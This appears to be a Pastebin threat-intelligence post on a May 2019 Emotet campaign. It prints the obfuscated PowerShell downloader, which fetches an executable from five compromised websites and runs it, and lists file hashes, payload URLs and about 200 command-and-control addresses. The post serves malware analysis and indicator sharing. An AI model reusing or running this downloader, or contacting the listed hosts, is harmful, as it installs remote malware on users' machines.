Advertisement
HerbieZimmerman

2019-05-02 Emotet

May 2nd, 2019
1,714
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.93 KB | None | 0 0
  1. 2019-05-02 Emotet
  2. =================
  3.  
  4. PoSH Code
  5. ---------
  6. $F1XA_o='QAAAA41Q';
  7. $UAGZQAU = '415';
  8. $PA14AA='EAZC_ACD';
  9. $rA_GZAU=$env:userprofile+'\'+$UAGZQAU+'.exe';
  10. $U1B_QC='qAXUCD';
  11. $DAAwAQ=&('new-obj'+'e'+'ct') nET.w`EbC`Lie`NT;
  12. $cAAxoZ='http://hibara-ac.com/wp-content/uploads/r5zg416/@http://thitruonghaisan.com/wp-admin/d31l9/@https://www.limodc.net/bwi-car-rental/mpfg47/@http://ezviet.com/m267lxk/w1/@http://losgusano.com/emmw/z5vh6c090/'.SplIT('@');
  13. $o_AUUc='F1BUAU';
  14. foreach($NBokx_ in $cAAxoZ){try{$DAAwAQ.doWNLoAdfILE($NBokx_, $rA_GZAU);
  15. $MDxUZB='KA4AZUG';
  16. If ((&('Get-It'+'em') $rA_GZAU).lENgTh -ge 22607) {&('I'+'nvoke-I'+'te'+'m') $rA_GZAU;
  17. $NZQDAU='SADxxkw';
  18. break;
  19. $iAAACD='nUAGU4U'}}catch{}}$X4UoBADk='MX4ZAQBk'
  20.  
  21. Hash for attachment
  22. ---------------------
  23. c9d405ff0f955386c5afc4b2fdc9c3e7 --> https://www.virustotal.com/#/file/ad79acc87367bc014f33526b79ee8a0e71097eb2e383da4efa692e27e96273cb/detection
  24.  
  25. Hash for 'promptrelated'
  26. ------------------------
  27. 2DCCE6E396F1083583AD2FBAA86CB3E1 --> https://www.virustotal.com/#/file/acba54a4b5b72bba9b5b9036485fa0257c5dda20856f360dc8ea8cf0d764bac6/detection
  28.  
  29. Domains used
  30. ------------
  31. http://hibara-ac.com/wp-content/uploads/r5zg416/
  32. http://thitruonghaisan.com/wp-admin/d31l9/
  33. https://www.limodc.net/bwi-car-rental/mpfg47/
  34. http://ezviet.com/m267lxk/w1/
  35. http://losgusano.com/emmw/z5vh6c090/
  36.  
  37. C2
  38. ---
  39. 189.196.140.187:80
  40. POST 222.104.222.145:443/enable/glitch/ringin/merge
  41. POST 200.58.171.51:80/usbccid
  42. POST 222.104.222.145:443/pnp/results
  43. POST 222.104.222.145:443/ringin
  44. POST http://200.58.171.51/acquire/splash/loadan/merge/
  45. POST http://189.196.140.187/teapot/teapot/loadan/merge/
  46. POST http://222.104.222.145:443/cone/walk/loadan/
  47. POST http://115.132.227.247:443/free/
  48. POST http://190.85.206.228/prov/
  49. POST http://159.69.211.211:8080/balloon/
  50. POST http://185.94.252.27:443/acquire/
  51. POST http://185.94.252.249:443/entries/
  52. POST http://219.94.254.93:8080/forced/
  53. POST http://66.228.45.129:8080/ringin/
  54. POST http://181.30.126.66/mult/
  55. POST http://109.104.79.48:8080/balloon/
  56. POST http://200.114.142.40:8080/acquire/
  57. POST http://23.254.203.51:8080/forced/
  58. POST http://45.33.35.103:8080/ringin/
  59. POST http://181.142.29.90/mult/
  60. POST http://69.163.33.82:8080/health/
  61. POST http://181.37.126.2/acquire/
  62. POST http://91.205.215.57:7080/entries/
  63. POST http://51.255.50.164:8080/forced/
  64. POST http://175.107.200.27:443/ringin/
  65. POST http://103.201.150.209/mult/
  66. POST http://24.150.44.53/health/
  67. POST http://139.59.19.157/raster/
  68. POST http://66.209.69.165:443/entries/
  69. POST http://192.163.199.254:8080/forced/
  70. POST http://185.86.148.222:8080/ringin/
  71. POST http://196.6.112.70:443/mult/
  72. POST http://190.171.230.41/health/
  73. POST http://181.199.151.19/raster/
  74. POST http://62.75.143.100:7080/entries/
  75. POST http://107.159.94.183:8080/forced/
  76. POST http://81.3.6.78:7080/mult/
  77. POST http://103.213.212.42:443/health/
  78. POST http://181.29.101.13/raster/
  79. POST http://186.71.54.77:20/entries/
  80. POST http://85.132.96.242/tlb/
  81. POST http://82.226.163.9/sess/
  82. POST http://43.229.62.186:8080/enable/
  83. POST http://190.117.206.153:443/health/
  84. POST http://190.180.52.146:20/raster/
  85. POST http://201.203.99.129:8080/entries/
  86. POST http://5.9.128.163:8080/tlb/
  87. POST http://109.73.52.242:8080/sess/
  88. POST http://72.47.248.48:8080/health/
  89. POST http://200.28.131.215:443/raster/
  90. POST http://144.76.117.247:8080/glitch/
  91. POST http://77.82.85.35:8080/tlb/
  92. POST http://186.139.160.193:8080/sess/
  93. POST http://189.205.185.71:465/enable/
  94. POST http://210.2.86.72:8080/health/
  95. POST http://213.172.88.13/raster/
  96. POST http://200.107.105.16:465/glitch/
  97. POST http://192.155.90.90:7080/tlb/
  98. POST http://37.59.1.74:8080/sess/
  99. POST http://165.227.213.173:8080/enable/
  100. POST http://176.58.93.123:8080/codec/
  101. POST http://187.188.166.192/raster/
  102. POST http://200.58.171.51/glitch/
  103. POST http://189.196.140.187/arizona/
  104. POST http://222.104.222.145:443/srvc/
  105. POST http://115.132.227.247:443/enable/
  106. POST http://190.85.206.228/codec/
  107. POST http://159.69.211.211:8080/scripts/
  108. POST http://185.94.252.27:443/glitch/
  109. POST http://185.94.252.249:443/arizona/
  110. POST http://219.94.254.93:8080/srvc/
  111. POST http://66.228.45.129:8080/enable/
  112. POST http://181.30.126.66/codec/
  113. POST http://109.104.79.48:8080/scripts/
  114. POST http://200.114.142.40:8080/glitch/
  115. POST http://23.254.203.51:8080/srvc/
  116. POST http://45.33.35.103:8080/enable/
  117. POST http://181.142.29.90/codec/
  118. POST http://69.163.33.82:8080/scripts/
  119. POST http://181.37.126.2/glitch/
  120. POST http://91.205.215.57:7080/arizona/
  121. POST http://51.255.50.164:8080/srvc/
  122. POST http://175.107.200.27:443/devices/
  123. POST http://103.201.150.209/codec/
  124. POST http://24.150.44.53/scripts/
  125. POST http://139.59.19.157/glitch/
  126. POST http://66.209.69.165:443/arizona/
  127. POST http://192.163.199.254:8080/srvc/
  128. POST http://185.86.148.222:8080/devices/
  129. POST http://196.6.112.70:443/codec/
  130. POST http://190.171.230.41/enabled/badge/
  131. POST http://181.199.151.19/symbols/balloon/loadan/
  132. POST http://62.75.143.100:7080/loadan/health/
  133. POST http://107.159.94.183:8080/child/site/loadan/
  134. POST http://81.3.6.78:7080/iab/
  135. POST http://103.213.212.42:443/between/
  136. POST http://181.29.101.13/enabled/
  137. POST http://186.71.54.77:20/vermont/
  138. POST http://85.132.96.242/schema/
  139. POST http://82.226.163.9/between/
  140. POST http://43.229.62.186:8080/enabled/
  141. POST http://190.117.206.153:443/prov/
  142. POST http://190.180.52.146:20/schema/
  143. POST http://201.203.99.129:8080/between/
  144. POST http://5.9.128.163:8080/sym/
  145. POST http://109.73.52.242:8080/prov/
  146. POST http://72.47.248.48:8080/between/
  147. POST http://200.28.131.215:443/sym/
  148. POST http://144.76.117.247:8080/prov/
  149. POST http://77.82.85.35:8080/schema/
  150. POST http://186.139.160.193:8080/between/
  151. POST http://189.205.185.71:465/sym/
  152. POST http://210.2.86.72:8080/prov/
  153. POST http://213.172.88.13/schema/
  154. POST http://200.107.105.16:465/entries/
  155. POST http://192.155.90.90:7080/sym/
  156. POST http://37.59.1.74:8080/prov/
  157. POST http://165.227.213.173:8080/schema/
  158. POST http://176.58.93.123:8080/entries/
  159. POST http://187.188.166.192/usbccid/
  160. POST http://200.58.171.51/mult/
  161. POST http://189.196.140.187/schema/
  162. POST http://222.104.222.145:443/entries/
  163. POST http://115.132.227.247:443/usbccid/
  164. POST http://190.85.206.228/mult/
  165. POST http://159.69.211.211:8080/attrib/
  166. POST http://185.94.252.27:443/entries/
  167. POST http://185.94.252.249:443/merge/rtm/loadan/merge/
  168. POST http://219.94.254.93:8080/iab/acquire/loadan/merge/
  169. POST http://66.228.45.129:8080/img/scripts/loadan/
  170. POST http://181.30.126.66/health/window/
  171. POST http://109.104.79.48:8080/stubs/enabled/loadan/
  172. POST http://200.114.142.40:8080/symbols/usbccid/loadan/merge/
  173. POST http://23.254.203.51:8080/attrib/glitch/
  174. POST http://45.33.35.103:8080/codec/child/loadan/
  175. POST http://181.142.29.90/between/
  176. POST http://69.163.33.82:8080/pdf/
  177. POST http://181.37.126.2/publish/
  178. POST http://91.205.215.57:7080/cookies/
  179. POST http://51.255.50.164:8080/codec/tlb/loadan/merge/
  180. POST http://175.107.200.27:443/acquire/arizona/loadan/merge/
  181. POST http://103.201.150.209/merge/loadan/loadan/
  182. POST http://24.150.44.53/merge/free/
  183. POST http://139.59.19.157/pnp/xian/loadan/
  184. POST http://66.209.69.165:443/xian/
  185. POST http://192.163.199.254:8080/symbols/
  186. POST http://185.86.148.222:8080/health/
  187. POST http://196.6.112.70:443/odbc/
  188. POST http://190.171.230.41/sym/publish/
  189. POST http://181.199.151.19/cab/schema/loadan/merge/
  190. POST http://62.75.143.100:7080/site/attrib/loadan/merge/
  191. POST http://107.159.94.183:8080/psec/prov/
  192. POST http://81.3.6.78:7080/cab/iplk/loadan/merge/
  193. POST http://103.213.212.42:443/site/cookies/loadan/merge/
  194. POST http://181.29.101.13/health/badge/loadan/
  195. POST http://186.71.54.77:20/xian/
  196. POST http://85.132.96.242/symbols/
  197. POST http://82.226.163.9/codec/
  198. POST http://43.229.62.186:8080/odbc/
  199. POST http://190.117.206.153:443/arizona/
  200. POST http://190.180.52.146:20/symbols/
  201. POST http://201.203.99.129:8080/codec/
  202. POST http://5.9.128.163:8080/cab/
  203. POST http://109.73.52.242:8080/arizona/
  204. POST http://72.47.248.48:8080/cone/usbccid/loadan/
  205. POST http://200.28.131.215:443/ringin/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement